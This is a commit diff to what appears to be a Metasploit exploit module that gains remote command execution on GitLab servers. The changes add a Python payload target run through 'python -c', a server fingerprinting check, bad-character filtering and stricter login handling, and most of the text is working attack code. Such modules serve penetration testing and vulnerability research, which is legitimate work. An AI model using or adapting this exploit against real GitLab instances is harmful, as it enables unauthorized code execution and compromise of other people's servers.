Implement suggestions

This commit addresses feedback such as adding a check
function and changing the login fail case by being
more specific on what is checked for. The failing
ARCH_CMD payloads were addressed by adding BadChars.
Last, an ARCH_PYTHON target was added based on
@zeroSteiner's feedback.

Author: kaospunk

modules/exploits/multi/http/gitlab_shell_exec.rb

@@ -50,10 +50,16 @@ def initialize(info = {})
             'Payload' =>
                 {
                   'Compat'      => {
-                    'RequiredCmd' => 'perl python ruby openssl netcat'
-                  }
+                    'RequiredCmd' => 'openssl perl python'
+                  },
+                  'BadChars' => "\x22"
                 }
 
+          }],
+          ['Python', {
+            'Platform' => 'python',
+            'Arch' => ARCH_PYTHON,
+            'Payload' => { 'BadChars' => "\x22" }
           }]
         ],
       'CmdStagerFlavor' => %w( bourne printf ),
@@ -70,9 +76,12 @@ def initialize(info = {})
 
   def exploit
     login
-    if target.name == 'Unix (CMD)'
+    case target['Platform']
+    when 'unix'
       execute_command(payload.encoded)
-    else
+    when 'python'
+      execute_command("python -c \\\"#{payload.encoded}\\\"")
+    when 'linux'
       execute_cmdstager(temp: './', linemax: 2800)
     end
   end
@@ -82,10 +91,20 @@ def execute_command(cmd, _opts = {})
     delete_key(key_id)
   end
 
+  def check
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))
+    if res && res.body.include?('GitLab')
+      return Exploit::CheckCode::Detected
+    else
+      vprint_error("#{peer} - Connection timed out")
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
   def login
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
-    signin_page = normalize_uri(datastore['TARGETURI'], 'users', 'sign_in')
+    signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')
 
     # Get a valid session cookie and authenticity_token for the next step
     res = send_request_cgi(
@@ -122,16 +141,16 @@ def login
                               }
                           )
 
-    fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res
+    fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302
 
     @session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
   end
 
   def add_key(cmd)
     if @gitlab_version == 5
-      @key_base = normalize_uri(datastore['TARGETURI'], 'keys')
+      @key_base = normalize_uri(target_uri.path.to_s, 'keys')
     else
-      @key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
+      @key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys')
     end
 
     # Perform an initial request to get an authenticity_token so the actual